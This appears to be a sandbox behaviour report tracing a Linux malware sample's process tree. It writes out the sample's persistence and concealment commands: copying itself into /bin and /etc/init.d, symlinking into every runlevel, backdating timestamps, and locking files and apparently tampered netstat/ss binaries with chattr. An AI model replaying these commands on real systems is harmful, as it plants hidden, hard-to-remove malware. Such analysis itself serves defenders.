Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	/tmp/tmpnam_KEKnmE upgrade
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5472 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5479 Parent PID: 5472

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5488 Parent PID: 5479

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5497 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5506 Parent PID: 5497

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5506 Parent PID: 5497

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5515 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5515 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5524 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5537 Parent PID: 5524

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5537 Parent PID: 5524

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5548 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5548 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5558 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5567 Parent PID: 5558

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: chattr PID: 5567 Parent PID: 5558

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/chattr
Arguments:	chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /sbin/ss /sbin/scss /bin/netstat /bin/scnetstat
File size:	11544 bytes
MD5 hash:	429aabf876ae1d2fa2459219366d273c

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5584 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5597 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: cp PID: 5597 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/cp
Arguments:	cp -f /tmp/tmpnam_KEKnmE /bin/ddus-uidgen
File size:	155168 bytes
MD5 hash:	afc7c3ab2546d6d8a98854dcaaa731b3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5606 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: cp PID: 5606 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/cp
Arguments:	cp -f /bin/ddus-uidgen /etc/init.d/acpidtd
File size:	155168 bytes
MD5 hash:	afc7c3ab2546d6d8a98854dcaaa731b3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5617 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5617 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc0.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5625 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5625 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc1.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5633 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5633 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc2.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5642 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5642 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc3.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5650 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5650 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc4.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5659 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5659 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc5.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5668 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5668 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc6.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5677 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5677 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5685 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5685 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc.d/rc1.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5696 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5696 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc.d/rc2.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5705 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5705 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc.d/rc3.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5714 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5714 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc.d/rc4.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5722 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5722 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc.d/rc5.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5736 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: ln PID: 5736 Parent PID: 5584

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/acpidtd /etc/rc.d/rc6.d/S01acpidtd
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: touch PID: 5584 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/touch
Arguments:	touch -r /bin/sh /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd /etc/rc.d/rc1.d/S01acpidtd /etc/rc.d/rc2.d/S01acpidtd /etc/rc.d/rc3.d/S01acpidtd /etc/rc.d/rc4.d/S01acpidtd /etc/rc.d/rc5.d/S01acpidtd /etc/rc.d/rc6.d/S01acpidtd
File size:	62488 bytes
MD5 hash:	985a951b1a7a8dbe51973e651a365900

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5749 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5757 Parent PID: 5749

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5757 Parent PID: 5749

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5766 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5766 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5774 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5782 Parent PID: 5774

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5782 Parent PID: 5774

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5790 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5790 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5798 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5806 Parent PID: 5798

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: chattr PID: 5806 Parent PID: 5798

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/chattr
Arguments:	chattr +i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd /etc/rc.d/rc1.d/S01acpidtd /etc/rc.d/rc2.d/S01acpidtd /etc/rc.d/rc3.d/S01acpidtd /etc/rc.d/rc4.d/S01acpidtd /etc/rc.d/rc5.d/S01acpidtd /etc/rc.d/rc6.d/S01acpidtd /sbin/ss /sbin/scss /bin/netstat /bin/scnetstat
File size:	11544 bytes
MD5 hash:	429aabf876ae1d2fa2459219366d273c

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5820 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5828 Parent PID: 5820

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: grep PID: 5828 Parent PID: 5820

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/grep
Arguments:	grep processor /proc/cpuinfo
File size:	159024 bytes
MD5 hash:	6cd81dedcf076b9ad7cfbfec976245d5

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5829 Parent PID: 5820

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uniq PID: 5829 Parent PID: 5820

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/uniq
Arguments:	uniq
File size:	45784 bytes
MD5 hash:	a83f5f379d810462d528dc460d63a04b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5830 Parent PID: 5820

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: wc PID: 5830 Parent PID: 5820

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/wc
Arguments:	wc -l
File size:	41640 bytes
MD5 hash:	1304115f965d6c9062947a3b35d9e140

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5839 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5848 Parent PID: 5839

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: grep PID: 5848 Parent PID: 5839

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/grep
Arguments:	grep "model name" /proc/cpuinfo
File size:	159024 bytes
MD5 hash:	6cd81dedcf076b9ad7cfbfec976245d5

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5849 Parent PID: 5839

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uniq PID: 5849 Parent PID: 5839

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/uniq
Arguments:	uniq
File size:	45784 bytes
MD5 hash:	a83f5f379d810462d528dc460d63a04b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5860 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uname PID: 5860 Parent PID: 5488

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/uname
Arguments:	uname -r
File size:	33080 bytes
MD5 hash:	81136bf3b923238a5420a003d585a68f

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6169 Parent PID: 5488

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6170 Parent PID: 6169

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: grep PID: 6170 Parent PID: 6169

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/bin/grep
Arguments:	grep processor /proc/cpuinfo
File size:	159024 bytes
MD5 hash:	6cd81dedcf076b9ad7cfbfec976245d5

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6171 Parent PID: 6169

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uniq PID: 6171 Parent PID: 6169

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/bin/uniq
Arguments:	uniq
File size:	45784 bytes
MD5 hash:	a83f5f379d810462d528dc460d63a04b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6172 Parent PID: 6169

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: wc PID: 6172 Parent PID: 6169

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/bin/wc
Arguments:	wc -l
File size:	41640 bytes
MD5 hash:	1304115f965d6c9062947a3b35d9e140

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6173 Parent PID: 5488

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6174 Parent PID: 6173

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: grep PID: 6174 Parent PID: 6173

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/bin/grep
Arguments:	grep "model name" /proc/cpuinfo
File size:	159024 bytes
MD5 hash:	6cd81dedcf076b9ad7cfbfec976245d5

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6175 Parent PID: 6173

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uniq PID: 6175 Parent PID: 6173

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/bin/uniq
Arguments:	uniq
File size:	45784 bytes
MD5 hash:	a83f5f379d810462d528dc460d63a04b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6176 Parent PID: 5488

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uname PID: 6176 Parent PID: 5488

General

Start time:	15:21:09
Start date:	31/05/2018
Path:	/bin/uname
Arguments:	uname -r
File size:	33080 bytes
MD5 hash:	81136bf3b923238a5420a003d585a68f

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6266 Parent PID: 5488

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6267 Parent PID: 6266

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: grep PID: 6267 Parent PID: 6266

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/bin/grep
Arguments:	grep processor /proc/cpuinfo
File size:	159024 bytes
MD5 hash:	6cd81dedcf076b9ad7cfbfec976245d5

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6268 Parent PID: 6266

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uniq PID: 6268 Parent PID: 6266

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/bin/uniq
Arguments:	uniq
File size:	45784 bytes
MD5 hash:	a83f5f379d810462d528dc460d63a04b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6269 Parent PID: 6266

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: wc PID: 6269 Parent PID: 6266

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/bin/wc
Arguments:	wc -l
File size:	41640 bytes
MD5 hash:	1304115f965d6c9062947a3b35d9e140

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6270 Parent PID: 5488

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6271 Parent PID: 6270

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: grep PID: 6271 Parent PID: 6270

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/bin/grep
Arguments:	grep "model name" /proc/cpuinfo
File size:	159024 bytes
MD5 hash:	6cd81dedcf076b9ad7cfbfec976245d5

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6272 Parent PID: 6270

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uniq PID: 6272 Parent PID: 6270

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/bin/uniq
Arguments:	uniq
File size:	45784 bytes
